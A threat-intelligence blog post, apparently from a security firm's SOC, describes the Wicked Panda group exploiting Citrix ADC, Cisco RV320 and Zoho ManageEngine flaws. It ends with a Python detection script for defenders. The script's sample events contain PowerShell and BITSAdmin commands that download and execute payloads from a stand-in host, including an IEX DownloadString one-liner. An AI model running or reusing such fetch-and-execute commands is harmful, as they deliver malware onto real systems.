Wicked Panda Exploiting New Vulnerabilities

May 14, 2020

BlueVoyant

“Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities.

Wicked Panda is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity. They also carry out financially motivated activity, often outside of state control. Wicked Panda typically employs spear-phishing emails with malicious attachments for the initial compromise of an attack. After gaining access to a victim organization, they leverage more sophisticated TTPs (Tactics, Techniques and Procedures) and deploy additional malware.

Since the beginning of 2020, Wicked Panda has carried out a number of different campaigns making use of the major vulnerability releases from the last year. From late January to late March, it was observed attempting to exploit vulnerabilities in three major devices/tools: Citrix NetScaler / Application Delivery Controller (ADC), a Cisco router, and Zoho ManageEngine Desktop Central.

The devices can be found in a number of different industries from Banking/Finance and Healthcare to Telecommunications and Utilities. It’s unclear if Wicked Panda scanned the internet and attempted mass exploitation or targeted a subset of specific organizations. The victims appear to be more targeted in nature.

Citrix ADC (CVE-2019-19781)
CVE-2019-19781 allows any unauthorized attacker to access published applications, as well as attack other resources on the company’s internal network from the Citrix server. In this campaign, Wicked Panda first tested whether targeted systems had applied the mitigation steps (configuration changes) that Citrix published for use until a patch was available, and then deployed a backdoor on the systems. A new wave of attacks exploited the vulnerability with payloads that initiated a File Transfer Protocol (FTP) download in order to pull down a backdoor. This activity continued through the end of March, with the only major difference being the name of the payload being pulled.

Cisco Routers
In mid-February, Wicked Panda was seen exploiting a Cisco RV320 router (one of Cisco’s WAN VPN routers for small businesses) at a telecom organization. Post-exploitation, the threat actors downloaded both an executable and binary payload. Researchers aren’t sure what specific exploit was used, but pointed to a Metasploit module combining two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers.

Zoho ManageEngine Desktop Central (CVE-2020-10189)
Zoho ManageEngine Desktop Central is an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw (CVE-2020-10189) was first disclosed on March 5th as a zero-day, and was later patched on March 7. On March 8, the threat actors exploited the flaw to deploy payloads in one of two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program containing a set of commands. The commands then used PowerShell to download and execute the payloads. In a second attack, Wicked Panda leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.
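
Both delivery paths described above leave a process-creation trail that a SOC can hunt for. The following Python is an added example, not BlueVoyant's detection logic. It assumes a simplified event format (`parent`, `cmdline`), a JVM parent process (`java.exe`) for the management server, and a short list of download keywords, and it goes slightly beyond the text by also decoding PowerShell `-EncodedCommand` arguments.

```python
import base64
import re

JAVA_PARENTS = {"java.exe", "javaw.exe"}  # assumption: the management server runs under a JVM
PS_FETCH = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)
BITS_FETCH = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/(?:transfer|addfile)\b", re.I)
PS_ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)  # heuristic for -enc / -EncodedCommand

def expand_encoded(cmdline):
    """Append the decoded body of any PowerShell -EncodedCommand (base64 of UTF-16LE)."""
    parts = [cmdline]
    for blob in PS_ENCODED.findall(cmdline):
        try:
            parts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:  # not base64 or not UTF-16LE: keep only the raw text
            pass
    return " ".join(parts)

def classify(event):
    """Return (technique, severity) for a process-creation event, or None if nothing matches."""
    text = expand_encoded(event["cmdline"])
    if BITS_FETCH.search(text):
        technique = "bitsadmin-download"
    elif "powershell" in text.lower() and PS_FETCH.search(text):
        technique = "powershell-download"
    else:
        return None
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    return technique, ("high" if parent in JAVA_PARENTS else "medium")

def _enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed events: paths and URLs are invented (example.test is a reserved name).
SAMPLE_EVENTS = [
    {"parent": r"C:\EXAMPLE\jre\bin\java.exe",
     "cmdline": r"cmd /c powershell -nop -c (New-Object Net.WebClient).DownloadFile('http://example.test/a.bat','C:\Windows\Temp\a.bat')"},
    {"parent": r"C:\EXAMPLE\jre\bin\java.exe",
     "cmdline": r"cmd /c bitsadmin /transfer job1 http://example.test/b.exe C:\Windows\Temp\b.exe"},
    {"parent": r"C:\EXAMPLE\jre\bin\java.exe",
     "cmdline": "powershell -nop -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.test/c.ps1')")},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "bitsadmin /list /allusers"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"bitsadmin /transfer upd http://example.test/u.cab C:\Temp\u.cab"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), "|", ev["cmdline"][:60])
```

A download spawned by the JVM is rated high because a server process has little reason to fetch files that way. The same command from another parent is rated medium, since BITSAdmin and PowerShell downloads also occur in routine administration.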